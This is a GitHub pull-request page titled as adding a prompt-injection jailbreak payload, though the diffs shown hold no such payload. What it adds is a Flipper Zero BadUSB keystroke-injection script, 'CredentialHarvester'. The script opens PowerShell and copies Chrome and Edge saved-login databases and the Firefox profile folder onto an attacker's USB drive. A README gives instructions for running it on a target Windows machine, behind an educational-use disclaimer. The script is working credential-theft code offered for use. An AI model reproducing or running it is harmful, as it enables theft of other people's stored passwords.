Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Added Prompt Injection Payload For Jailbreak #724

Open
wants to merge 17 commits into
base: master
Choose a base branch
from
Open
56 changes: 56 additions & 0 deletions BadUSB/CredentialHarvester.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,56 @@
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% This script was created by github.com/markcyber %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% This is a badUSB script for the flipper zero to extract credentials %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% This script requires a secondary USB named "MYUSB" to save credentials to %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% The extracted data will require decryption %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM Open PowerShell with elevated privileges
DELAY 1000
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 1000
REM Check if the USB drive exists
STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter;
STRING if ($usbDrive -ne $null) {
ENTER
DELAY 500
STRING cd $usbDrive;
ENTER
DELAY 500
STRING mkdir BrowserData;
ENTER
DELAY 500
STRING cd BrowserData;
ENTER
DELAY 500
REM Copy Chrome Login Data to USB
STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data";
STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; }
ENTER
DELAY 500
REM Copy Firefox Login Data to USB
STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\";
STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; }
ENTER
DELAY 500
REM Copy Edge Login Data to USB
STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data";
STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; }
ENTER
DELAY 500
STRING }
ENTER
DELAY 500
REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC)
STRING echo off | clip
ENTER
DELAY 500
REM Close PowerShell
STRING exit
ENTER
DELAY 500
9 changes: 9 additions & 0 deletions BadUSB/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
# Flipper Zero BadUSB Scripts
---------------------
All of these scripts are for educational purposes only and not intended to be used for any malicious purposes. This is to act as a library showcasing my progress more than anything. If someone is to use any of these scripts, it is essential to have prior consent from all parties involved. Many of these scripts I have created have been improved upon using ai programs. I will not be held responsible for any actions taken using any of the scripts, techniques or tools mentioned below:

## [VulnerabilityScanner:](https://github.com/MarkCyber/PayloadsAllTheThings/blob/master/BadUSB/VulnerabilityScanner.txt)
This is a script intended to be ran by a flipper zero, utilizing a secondary USB for all results to be saved onto. This script will scan for vulnerabilities by the means of checking for outdated software, open ports, firewall and antivirus statuses, smbv1 status, network services, password and audit policies, and more. Then, this script will check for any CVEs that could be found and will save a results.txt file on the secondary USB in a folder with the PC name of the target machine being scanned. Logs will will also be saved onto that USB for further analysis if necessary.

## [CredentialHarvester:](https://github.com/MarkCyber/PayloadsAllTheThings/blob/master/BadUSB/CredentialHarvester.txt)
This is a script to be ran by the flipper zero, requiring a secondary USB. Name the secondary USB "MYUSB" and then plug it into the target windows machine. Then, the flipper is to be plugged in and the CredentialHarvester.txt script is to be ran. This script will take all of the credentials stored onto browsers such as Chrome, Firefox, and Edge- copying them onto the usb that is labeled MYUSB. Many of the files will either be encoded or encrypted, so due diligence is necessary when running this script (or any other script).
Loading